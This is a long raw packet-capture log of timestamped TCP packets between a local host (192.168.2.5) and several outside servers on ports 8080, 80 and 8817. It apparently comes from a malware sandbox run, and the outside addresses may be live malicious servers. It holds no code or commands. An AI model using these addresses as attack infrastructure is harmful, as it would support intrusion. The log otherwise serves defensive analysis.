                                                                                                                                                                                                Sep 27, 2024 23:27:37.195348978 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195363998 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195372105 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195379019 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195393085 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195429087 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195480108 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195540905 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195549965 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195558071 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195601940 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195626974 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195717096 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195780039 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200273037 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200315952 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200345039 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200356960 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200385094 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200418949 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200432062 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200443029 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200450897 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200458050 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200551987 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.243763924 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.244014025 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.272965908 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.291723013 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.291975021 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.339751005 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.339811087 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.391959906 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.392019033 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.439769983 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.439940929 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.491708040 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.491862059 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.539700985 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.539875984 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.587698936 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.587778091 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.639733076 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.639796019 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.687737942 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.687823057 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.739717007 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.739799976 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.787766933 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.787843943 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.836168051 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.836239100 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.883735895 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.883795977 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.931761026 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.931930065 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.979742050 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.979914904 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.027700901 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.027764082 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.075709105 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.075877905 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.123744011 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.123806000 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.175745010 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.175796986 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.223727942 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.223786116 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.275770903 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.275826931 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.327778101 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.327832937 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.379734993 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.379790068 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.427725077 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.427829981 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.475709915 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.475799084 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.523699999 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.523874998 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.571733952 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.571795940 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.619704962 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.619791985 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.667712927 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.667762995 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.715797901 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.715874910 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.763715982 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.763766050 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.811759949 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.811821938 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.863743067 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.863795996 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.911712885 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.911786079 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:38.959686995 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:38.959764957 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:39.007699013 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:39.007775068 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:39.059752941 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:39.059910059 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:39.107732058 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:39.107862949 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:39.159825087 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:42.165457964 CEST497358080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:42.167507887 CEST4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                Sep 27, 2024 23:27:42.170361042 CEST808049735167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:42.170463085 CEST497358080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:42.170727015 CEST497358080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:42.172518015 CEST8049709208.95.112.1192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:42.172579050 CEST4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                Sep 27, 2024 23:27:42.176525116 CEST808049735167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:43.530513048 CEST497358080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:58.208720922 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.210813999 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.215851068 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.215915918 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.216078997 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.221016884 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.565079927 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570214987 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570235968 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570245981 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570254087 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570271969 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570297956 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570318937 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570353031 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570384979 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570394039 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570400953 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570432901 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570437908 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570457935 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570485115 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.571521044 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.571568966 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575114012 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575158119 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575261116 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575268984 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575314045 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575330973 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575340033 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575391054 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575457096 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575500965 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575830936 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575917959 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.619882107 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.620125055 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.648814917 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.649096966 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654051065 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654145002 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654243946 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654328108 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654362917 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654419899 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654428005 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654436111 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654488087 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654495955 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654503107 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654534101 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654542923 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654551029 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654606104 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654613972 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654676914 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654757977 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654768944 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654786110 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654886961 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654895067 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654975891 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654989958 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654998064 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655006886 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655014992 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655061007 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655071020 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655090094 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655102968 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655126095 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655134916 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.097068071 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.097119093 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.097166061 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:59.106456995 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:59.107304096 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.111222029 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.112126112 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.112262011 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.114850998 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.119760990 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.471261978 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476402998 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476418972 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476475954 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476480007 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476531982 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476558924 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476573944 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476584911 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476612091 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476641893 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476671934 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476680994 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476716042 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476725101 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476759911 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476766109 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476815939 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481276035 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481331110 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481338024 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481347084 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481353998 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481400967 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481420040 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481429100 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481477976 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.523775101 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.523921013 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.552196026 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.552530050 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557410002 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557435036 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557460070 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557513952 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557539940 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557548046 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557595015 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557604074 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557611942 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557651043 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557658911 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557723045 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557732105 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557774067 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557787895 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557876110 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557957888 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557966948 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558051109 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558118105 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558136940 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558151960 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558223963 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558456898 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.006097078 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.006333113 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.006541967 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:28:00.006694078 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:28:00.007095098 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.011513948 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.011993885 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.012096882 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.012242079 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.017071009 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.361866951 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.366864920 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.366938114 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.366982937 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.366991997 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.366997957 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367022991 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367028952 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367032051 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367038965 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367047071 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367054939 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367101908 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.371845961 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.371970892 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.371982098 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.371998072 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.372059107 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.372065067 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.372067928 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.372081041 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.372123957 CEST497398817192.168.2.5188.120.242.78
